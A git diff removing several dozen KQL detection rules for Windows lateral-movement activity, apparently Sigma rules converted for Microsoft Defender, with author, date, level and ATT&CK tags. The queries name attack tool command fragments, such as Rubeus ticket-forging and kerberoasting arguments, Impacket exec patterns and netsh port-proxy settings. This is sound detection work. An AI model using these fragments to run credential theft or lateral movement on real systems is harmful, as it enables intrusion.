@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019/12/30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql b/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql deleted file mode 100644 index d07c94db..00000000 --- a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/26
-// Level: high
-// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
-// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
deleted file mode 100644
index 3ef522cf..00000000
--- a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019/09/03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Rubeus_Execution.kql b/Lateral Movement/HackTool_-_Rubeus_Execution.kql
deleted file mode 100644
index 134f2523..00000000
--- a/Lateral Movement/HackTool_-_Rubeus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
-// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql b/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql
deleted file mode 100644
index 2c391cb7..00000000
--- a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Luca Di Bartolomeo (CrimpSec)
-// Date: 2024/01/29
-// Level: high
-// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
-
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql b/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql
deleted file mode 100644
index 7a831987..00000000
--- a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/07
-// Level: medium
-// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-// Tags: attack.lateral_movement, attack.t1021.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe"
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql
deleted file mode 100644
index 68ddb59a..00000000
--- a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/08
-// Level: high
-// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
-// Tags: attack.defense_evasion, attack.lateral_movement
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/Lateral Movement/MMC_Spawning_Windows_Shell.kql b/Lateral Movement/MMC_Spawning_Windows_Shell.kql
deleted file mode 100644
index e74f2325..00000000
--- a/Lateral Movement/MMC_Spawning_Windows_Shell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Swisscom CSIRT
-// Date: 2019/08/05
-// Level: high
-// Description: Detects a Windows command line executable started from MMC
-// Tags: attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN")
\ No newline at end of file
diff --git a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql b/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql
deleted file mode 100644
index 9d8271d6..00000000
--- a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/18
-// Level: high
-// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
-// Tags: attack.lateral_movement
-DeviceProcessEvents
-| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe")
\ No newline at end of file
diff --git a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql b/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql
deleted file mode 100644
index edd848c1..00000000
--- a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/06/22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"
\ No newline at end of file
diff --git a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index bde86a78..00000000
--- a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql b/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql
deleted file mode 100644
index 24c6c93b..00000000
--- a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/07
-// Level: medium
-// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
-Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-
-// Tags: attack.lateral_movement, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /v:" and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql b/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql
deleted file mode 100644
index bec2a777..00000000
--- a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/05/15
-// Level: high
-// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
-An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
-
-// Tags: attack.lateral_movement, attack.t1021.001, car.2013-07-002
-DeviceNetworkEvents
-| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or 
InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ "")))
\ No newline at end of file
diff --git a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
deleted file mode 100644
index 09b3d975..00000000
--- a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detect use of PDQ Deploy remote admin tool
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql b/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql
deleted file mode 100644
index 9edcca22..00000000
--- a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql b/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql
deleted file mode 100644
index 986261d9..00000000
--- a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/12
-// Level: medium
-// Description: Detects port forwarding activity via SSH.exe
-// Tags: attack.command_and_control, attack.lateral_movement, attack.t1572, attack.t1021.001, attack.t1021.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql
deleted file mode 100644
index ce7ee51b..00000000
--- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql
deleted file mode 100644
index 0f172583..00000000
--- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003
-DeviceImageLoadEvents
-| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql b/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql
deleted file mode 100644
index 5103ee52..00000000
--- a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Aaron Stratton
-// Date: 2023/11/13
-// Level: high
-// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
-
-// Tags: attack.t1021.003, attack.lateral_movement
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql b/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql
deleted file mode 100644
index b4c31b54..00000000
--- a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/01/24
-// Level: high
-// Description: Detects RDP session hijacking by using MSTSC shadowing
-// Tags: attack.lateral_movement, attack.t1563.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
deleted file mode 100644
index ff92bcaa..00000000
--- a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql b/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql
deleted file mode 100644
index dd48e1e7..00000000
--- a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
-// Tags: attack.lateral_movement, attack.t1021
-DeviceProcessEvents
-| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ")
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
deleted file mode 100644
index 6cbd83b0..00000000
--- a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql b/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql
deleted file mode 100644
index a8265a7e..00000000
--- a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
-// Tags: attack.lateral_movement, attack.t1021
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
diff --git a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql b/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql
deleted file mode 100644
index 9f1c5485..00000000
--- a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Samir Bousseaden
-// Date: 2019/02/16
-// Level: high
-// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
-// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001, car.2013-07-002
-DeviceNetworkEvents
-| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)
\ No newline at end of file
diff --git a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 85c02aac..00000000
--- a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019/01/29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
